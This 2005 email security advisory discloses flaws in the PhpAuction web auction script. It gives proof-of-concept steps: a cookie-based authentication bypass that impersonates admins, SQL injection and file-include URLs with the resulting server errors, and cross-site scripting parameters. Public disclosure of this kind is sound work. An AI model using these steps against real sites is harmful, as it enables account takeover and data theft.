This is a multi-part message in MIME format. ------=_NextPart_000_0009_01C58325.6436F8C0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable -------------------------------------------------------------------------= ------- Dcrab 's Security Advisory http://www.dbtech.org Deadbolt Computer Technologies ****************************** SPECIAL BIRTHDAY RELEASE, 18TH BIRTHDAY RELEASE FOR DIABOLIC CRAB, YOU = CAN SEND EMAILS TO DCRAB@HACKERSCENTER.COM ****************************** Get Dcrab's Services to audit your Web servers, scripts, networks, etc = or even code them. Learn more at http://www.dbtech.org Severity: High Title: [Bday Release] PhpAuction has Authentication Bypass, Multiple Sql = injection, Cross Site Scripting and File Include vulnerabilities Date: 8/07/2005 Vendor: PhpAuction Vendor Website: http://www.phpauction.org Vendor Status: Contacted but no reply Summary: There are, Authentication Bypass, Multiple Sql injection, Cross = Site Scripting and File Include vulnerabilities in PhpAuction. Proof of Concept Exploits:=20 Authentication bypass Set the cookie as follows, Name: PHPAUCTION_RM_ID VALUE: Id number of the user/admin you want to impersinate (you can get = it from thier profile) Access the website, and you'r instantly logged in as them ;) /phpauction-gpl-2.5/adsearch.php?title=3D1&desc=3Don&closed=3Don&category= =3D'SQL_INJECTION&minprice=3D1&maxprice=3D1&payment%5B%5D=3Don&payment%5B= %5D=3Don&payment%5B%5D=3Don&payment%5B%5D=3Don&seller=3D1&country=3DAfgha= nistan&ending=3D1&SortProperty=3Dends&type=3D2&action=3Dsearch&go=3DGO%20= %3E%3E Warning: mysql_fetch_assoc(): supplied argument is not a valid MySQL = result resource in = /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/ad= search.php on line 33 /viewnews.php?id=3D'SQL_INJECTION Error: select * from PROSITE_news where id=3D\'SQL_INJECTION You have an error in your SQL syntax. Check the manual that corresponds = to your MySQL server version for the right syntax to use near = '\'SQL_INJECTION' at line 1 /phpauction-gpl-2.5/index.php?lan=3D Cross Site Scripting /phpauction-gpl-2.5/profile.php?auction_id=3D&id=3D159 Cross Site Scripting /phpauction-gpl-2.5/admin/index.php?lan=3D Cross Site Scripting /viewnews.php?id=3D Cross Site Scripting /phpauction-gpl-2.5/index.php?lan=3D../put/.inc.php/file/name/here Warning: = main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me= ssages.../put/.inc.php/file/name/here.inc.php): failed to open stream: = No such file or directory in = /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in= cludes/messages.inc.php on line 34 Fatal error: main(): Failed opening required = '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag= es.../put/.inc.php/file/name/here.inc.php' = (include_path=3D'.:/usr/local/lib/php') in = /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in= cludes/messages.inc.php on line 34 /phpauction-gpl-2.5/admin/index.php?lan=3D../put/.inc.php/file/name/here Warning: = main(/home/**********/********/public_html/phpauction-gpl-2.5/includes/me= ssages.../put/.inc.php/file/name/here.inc.php): failed to open stream: = No such file or directory in = /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in= cludes/messages.inc.php on line 34 Fatal error: main(): Failed opening required = '/home/**********/********/public_html/phpauction-gpl-2.5/includes/messag= es.../put/.inc.php/file/name/here.inc.php' = (include_path=3D'.:/usr/local/lib/php') in = /home/phpauction/domains/phpauction.org/public_html/phpauction-gpl-2.5/in= cludes/messages.inc.php on line 34 Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah = and at http://www.hackerscenter.com Author:=20 These vulnerabilities have been found and released by Diabolic Crab, = Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to = contact me regarding these vulnerabilities. You can find me at, = http://www.hackerscenter.com or http://www.dbtech.org/. Lookout for my = soon to come out book on Secure coding with php. Sincerely,=20 Diabolic Crab=20 ------=_NextPart_000_0009_01C58325.6436F8C0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable